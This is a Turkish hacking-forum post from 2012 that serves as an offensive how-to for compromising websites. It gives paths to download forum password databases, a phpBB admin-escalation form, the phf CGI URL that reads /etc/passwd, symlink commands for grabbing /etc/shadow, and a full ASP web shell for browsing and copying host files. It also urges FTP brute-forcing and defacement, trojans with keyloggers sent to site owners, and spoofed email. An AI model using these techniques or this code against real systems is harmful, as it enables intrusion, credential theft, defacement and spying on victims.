Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.






Site güvenlik açıkları ve hackleme

Web & Server Güvenliği

Yeni Konu aç Konu Kapatılmıştır
 
Seçenekler
Alt 12-07-2012 20:03   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
08/2008
Nereden
Ankara
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 16
Teşekkür (Aldı): 75


Exclamation Site güvenlik açıkları ve hackleme



*Güvenlik Aciklari(asp,php,cgi,phf vb. gibi)

*Exploitler

*Fso(NtDaddy),listpathler

*Bruteforce

*Wordlist

*Birebir Baglanti(trojanlar vs)

*Fakemail

*Flood


Simdi bunlari teker teker inceleyelim:

_____GUVENLIK ACIKLARI:_____

Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:

www.forumunadresi.com/admin/wwwforum.mdb

olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye

Kod:

www.forumadresi.com/snitz_forums_2000.mdb

adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde

Kod:

www.siteadresi.com/db/main.mdb den

database'e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar

Kod:

/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb
gibi

Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari

Kod:

.N-Stealth
.Whisker
.Retina
.twwwscan
.m3hm3t's CGI scanner
'dır.

Php Sistemlerinin aciklari:

Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna

/ml_config.dat

ekLeyerek admin şifresine uLaşabiLirsiniz.

bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini anlamaniza yardimci olacagina inaniyorum.

Kod:

<form method="post" action="http://forum sayfası/admin/admin_ug_auth.php">

<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />

</form>
</body>
</html>


Cgi scriptleri acigi:

WEBBS de bulunan bir acik.

Kod:

http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/

Webadverts(reklam) acigi:

Siteye konan reklamlarin hepsi icin ayri hesap acilir.
Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.

Açık : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt

WWW Board Scriptleri:

Açık : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açık : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açık : http://www.hedefsite.com/webboard/password.txt

Biraz da phfden bahsetmek istiyorum:

96'da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:

http://KIRACAGIMIZADRES/cgi-bin/phf...0a/bin/cat%20/e tc/passwd yaziyoruz browsera. VE ENTER dedigimizde
error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
Örnek vermek gerekirse:

www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh

yada

www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh

gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.

_____EXPLOİTLER:_____

Çok kullanicili isletim sistemlerinde,sitelerde size bir boslugu kullanarak özel yetkiler vermek icin yazilan programlara
exploit adi veriyoruz.Exploit bize belirli bir sistemde yöneticilik ünvani verir.Bu ünvanlar NT'de administrator,Novell'da
supervisor,UNIX de clone yada root olarak siralanabilir.İki tür exploit bulunur bunlar remote(sistemin parcasi olmadan
kullabileceginiz exploitler) vede local(kullanmak icin sistemin bir parcasi olmaniz gerekenler) olarak siralanabilir.
Exploitler , sistemde ki buglar sayesin de r00t seviyesine çıkabilmek için yazılmış programlardır.

Bagzi örnek exploitler vermek istiyorum :
"overflow" exploiti (FreeBSD'de lprm açığı):.Pointer
artimetiğini kullanarak (Pointer değişkenler değişkenin içindeki bilgiyle birlikte bellek adresini de tutarlar) tampon belleğe (buffer) bir string kopyalayarak taşma oluşturur. Sistemdeki lprm komutunu kullanır. lprm komutu uzaktaki bir yazıcıya gönderilen bir işi iptal etmeye yarar. "lprm -P bloggs" komutuyla iş iptal edilebilirken kuyruktaki ikinci bir
iş aynı anda "lprm -P bloggs bloggs" la iptal edilebilir. Bu da buffer owerflow hatası meydana getirir. Bu sayede "root" erişimi sağlanır. Lokal bir exploittir.

Derleyici ve /tmp Hataları (Solaris'de gcc tempfile açığı): Gcc derleyicisinin 2.7.2.x ve önceki sürümlerinde
/tmp dizinine (geçici işlemlerin yürütüldüğü dizin. Windows dizini altındaki temp dizini gibi) sembolik link
(bir dosyaya ya da dizine ulaşabilmek için konan linkler. Windows'taki .lnk dosyaları gibi) oluşturulur ve bu
linkten yararlanarak lokal root hakkı alınır.
Program Hataları (Linux'daki X11Amp Programı açığı): X11Amp çalıştırıldığında ~./X11amp isminde bir dosya oluşturur.
Bu hatayı linux'ta şöyle kullanabilirsiniz:
mkdir ~/.x11amp
ln -s /etc/shadow ~/.x11amp/ekl

Bu komutları yazdıktan sonra X11Amp'i çalıştırıp "ekl" 'yi seçin bütün girişleri seçip silin. Program çakılacak ve
/etc/shadow dosyasını alabileceksiniz.
Microsoft'un FrontPage Server Extensions'unda karşılaşı.. açıklar: Frontpage extensions'un kullanıldığı web sitelerinde
pek çok açık bulmak mümkün, örneğin Frontpage 98'de dizin erişim hakları iyi düzenlenmediği için _vti_pvt dizini
"WORLD WRITABLE" olarak düzenlenmiş. _vti_pvt dizininde ise "service.pwd" dosyasında şifreler tutulmakta
Exploit uygulamali kullanimi icin size ayrica bir döküman hazirlayacagim.

_____FSO(NTDADDY),LISTPATH:______

Çoğumuz elmali şeker yada sadece şeker diye tanidik.Bir hostta kiralanan bir yere upload edilen bir asp kodudur.Bize Hosttaki tüm
domainlere erişim hakki saglar.Piyasada bir çok FSO kodu bulabilirsiniz.Belesh domain ve hostlarda bosuna denemeyin ise
yaramaz.Yeni listhpathler icin sık sık hack sitlerini ziyaret etmenizi öneririm.Çok yakinda üzerinde oynamalar yaptigim
süper bi şekeri tuzakonline.com da piyasaya sürücem.Simdilik bekleyin.Bu methodun bütün hostlarda calismasi konusunda
garanti veremem.Ama size su an icin kullanabileceginiz bir kac FSO kodunu cok yakinda sitede yayinlayacagim.Buna özel
ayri bir döküman da sitemizde mevcuttur.
Örnek bir Fso kodu yaziyorum.Su an Calisip calismadigindan emin degilim ama ileri derecede asp biliyorsaniz isin
mantigini kaparsiniz

Kod:

<%@ Language=VBScript %>
<%
Option Explicit

Dim giCount
Dim gvAttributes

Dim Ext

Dim ScriptFolder
Dim FolderPath

Dim FileSystem
Dim Drives
Dim Drive
Dim Folders
Dim Folder
Dim SubFolders
Dim SubFolder
Dim Files
Dim File

Dim BgColor, BackgroundColor,FSO

If Request.QueryString("CopyFolder") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFolder Request.QueryString("CopyFolder") & "*", "d:"
End If

If Request.QueryString("CopyFile") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSEDITTEDopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"),
"d:"
End If

Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")

FolderPath = Request.QueryString("FolderPath")

If FolderPath = "" Then
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
End If

FolderPath = ParseFolder(FolderPath)

ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLAT ED")) & "images"

%>
<html>
<head>
<title>Remote Explorer</title>
<style type="text/css">
BODY
{
BACKGROUND-COLOR: #C0C0C0
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
MARGIN: 0px
}
TD,INPUT,SELECT
{
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
}
.Address
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: 1px center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
.Go
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: left center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
</style>
</head>
<body bgcolor="#c0c0c0">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<form>
<td width="1%" nowrap>
<select name="FolderPath" id="Drive">
<%
Set Drives = FileSystem.Drives
For Each Drive In Drives
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":"""
If InStr(UCase(FolderPath), Drive.DriveLetter & ":") > 0 Then Response.Write "
selected"
Response.Write ">"
Response.Write Drive.DriveLetter & " - "
If Drive.DriveType = "Remote" Then
Response.Write Drive.ShareName & " [share]"
ElseIf Drive.DriveLetter <> "A" Then
If Drive.IsReady Then
Response.Write Drive.VolumeName
Else
Response.Write "(Not Ready)"
End If
Else
Response.Write "(Skiped Detection)"
End If
Response.Write "</OPTION>"
Next
%>
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
</td>
</form>
<td width="1%"> Address: </td>
<form>
<td width="100%">
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>"
style="width:100%">
</td>
<td width="1%">
<input class="Go" type="submit" value="Go"style="border:1px outset">
</td>
</form>
</tr>
</table>
<%
Set Folder = FileSystem.GetFolder(FolderPath)
Set SubFolders = Folder.SubFolders
Set Files = Folder.Files
%>
<br>
<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center"
style="border:1px inset">
<tr>
<td width="40%" height="20" bgcolor="silver"> Name</td>
<td width="10%" bgcolor="silver" align="right">Size </td>
<td width="20%" bgcolor="silver">Type </td>
<td width="20%" bgcolor="silver">Modified </td>
<td width="10%" bgcolor="silver" align="right">Attributes </td>
</tr>
<%
If Not Folder.IsRootFolder Then
BgToggle
%>
<tr title="Top Level">
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?F olde rPat h=<%=Server.URLPathEncode(Folder.Drive
& "")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%BgToggle%>
<tr>
<td bgcolor="<%=BgColor%>"><a href=
"<%=Request.ServerVariables("script_name")%>?F olde rPat h=<%=Server.URLPathEncode(Folder)%>"><font
face="wingdings" size="4">¶</font> Up One Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%
End If
For Each SubFolder In SubFolders
BgToggle
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href=
"<%=Request.ServerVariables("script_name") & "?FolderPath=" &
Server.URLPathEncode(FolderPath & SubFolder.Name & "")%>"><font face="wingdings"
size="4">0</font> <%=SubFolder.Name%></a> (<a href=
"<%=Request.ServerVariables("script_name")%>?C opyF olde r=<%=Server.URLPathEncode(FolderPath
& SubFolder.Name)%>&FolderPath=<%=Server.URLPathEnco de(FolderPath & "")%>">Copy</a>
</td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModi fied%> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)% > </td>
</tr>
<%
Next
For Each File In Files
BgToggle
Ext = FileExtension(File.Name)
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href=
"showcode.asp?f=<%=File.Name%>&FolderPath=<%=S e rver.URLPathEncode(FolderPath)%>"
target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a
href=
"<%=Request.ServerVariables("script_name")%>?C opyF ile= <%=File.Name%>&FolderPath=<%=Server.URLPathEnco de(FolderPath
& "")%>">Copy</a> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
<td bgcolor="<%=BgColor%>"><%=File.Type%></td& amp; amp; gt;
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified% ></td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></ td>
</tr>
<%Next%>
</table>
</body>
</html>
<%
Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
MinUpperBound, ByVal IndexSeperator)
Dim lsResult
Dim llTemp
Dim giCount
MaxValuePerIndex = MaxValuePerIndex + 1
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex
- 1)
MinUpperBound = MinUpperBound + 1
Loop
For giCount = MinUpperBound To 0 Step -1
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
lsResult = lsResult & CStr(llTemp)
If giCount > 0 Then lsResult = lsResult & IndexSeperator
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
Next
ConvertBinary = lsResult
End Function

Private Sub BgToggle()
BackgroundColor = Not(BackgroundColor)
If BackgroundColor Then
BgColor = "#efefef"
Else
BgColor = "#ffffff"
End If
End Sub

Private Function Attributes(AttributeValue)
Dim lvAttributes
Dim lsResult
lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
If lvAttributes(0) = 1 Then lsResult = "ReadOnly "
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden "
If lvAttributes(2) = 1 Then lsResult = lsResult & "System "
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive "
Attributes = lsResult
End Function

Private Function FileExtension(FileName)
Dim lsExt
Dim liCount
For liCount = Len(FileName) To 1 Step -1
If Mid(FileName, liCount, 1) = "." Then
lsExt = Right(FileName, Len(FileName) - liCount)
Exit For
End If
Next
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
lsExt = ""
End If
FileExtension = lsExt
End Function

Private Function ParseFolder(PathString)
Dim liCount
If Right(PathString, 1) = "" Then
ParseFolder = PathString
Else
For liCount = Len(PathString) To 1 Step -1
If Mid(PathString, liCount, 1) = "" Then
ParseFolder = Left(PathString, liCount)
Exit For
End If
Next
End If
End Function
%>


_____Brute Force:_____

Bu teknik icin öncelikle dua edin ki ftp sifresi az haneli olsun.Brute force icin kullanabileceginiz program Brutus AET2 dir
ki bu tuzakonline.com'da mevcuttur.Brute force un mantigi cok basittir.Brutus olabilecek kombinasyonlari cok hizli bir
sekilde dener.Ama bu özellikle sifre cok haneliyse ki muhtemelen öyledir,çok uzun zaman alir.Başariya ulasma olasiligi
düşük olsa bile buldugu sifre nin calismama olasiligi yoktur .Size FTP sifresini verir.Buldugunuz sifre ile bence tüm
dosyalari silin kendi hazirladiginiz indexi koyun.

_____Wordlist:_____

Wordlistler icinde bir cok sözcügün bulundugu basit dosyalardir.Siz brute forcerlarla cok hizli bir sekilde elinizdeki
wordlistteki kelimeleri denersiniz.Wordlistler tahminen 5-10 bin kelimeden olusurlar ve eger elde etmeye calistiginiz ftp
sifresi bu wordlistler icindeyse sifreyi bulursunuz.Basariya ulasma olasiligi düsüktür.uldugu sifre nin calismama olasiligi
yoktur

_____Birebir Baglanti(trojanlar vs):_____

Lamer teknigidir bastan söylemem gerekli .Sitenin sahibiyle kurdugunuz basarili bir muhabbet sonucu elinizdeki trojan
serverini bence bir dosya ile birlestirip karsinizdaki kullaniciya yollayin.Site sahibinin makinasina baglandiktan sonra
bilgisayarina bir keylogger atin.Belirli araliklarla bilgisayarina girip log dosyasini kendi bilgisayariniza cekin.
Arada sitesinin passwordunu bulabilirsiniz.Bir diğer yöntem de Turkojan kullanarak mümkündür ki o daha saglikli dir.
Adamin bilgisayarina baglanip keyloggera calistirin .Sonra onunla sohbet edip bir sekilde sitesine ftp den erismesini
saglayin.Nasilsa sifresini girecektir.Sifresizce
not:Adamin sifreleri bilgisayarindaki password managerlarda kayitliysa yöntem basarisiz olur .Zaten eger basarili bir
webmastersa büyük ihtimalle serveri yemez .Site HTML falansa acik kullanamiyorsaniz deneyeblirsiniz.

_____Fakemail:_____

Mail site sahibi bakimindan büyük önem tasir.Genelde kullanilan Lame teknik adamin mailini hackleme hosttan sifre
istetmektir.Yine de denenebilen opsiyonlar arasindadir.Siteye Whois Cekip client maili(webmaster) hacklemeye calisin.
Hotmail,yahoo,usa.net,mynet fakemail kodlarini asagi yukari köklü her forumdan kolayca telep edebilirsiniz.İcine lycostan bi
mail form kodu koyarsaniz rahatca adama fake atabilirsiniz.Fakat eger adamin maili POP3 falansa ki eger
webmasteradi@siteninadi.com ise muhtemelen öyledir tavsiyem kendi fake kodunuzu yazmanizdir.Biraz coderlık bilen herkes cok
rahatca kendi fake kodunu yazabilir.Bana mail atin bagzi irc serverlari,icq,bazi mail serverlari ve diger pop3 hesaplarini
kandirmak icin size kendi özel fake kodlarimi yollarim.




___________________________________________

Sen susup içine çekersin söylemediklerini,Onlarınsa gördüğü sadece sigara içen birisi...

 Offline  
 
Konu Kapatılmıştır

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli
instagram takipci hilesi

wau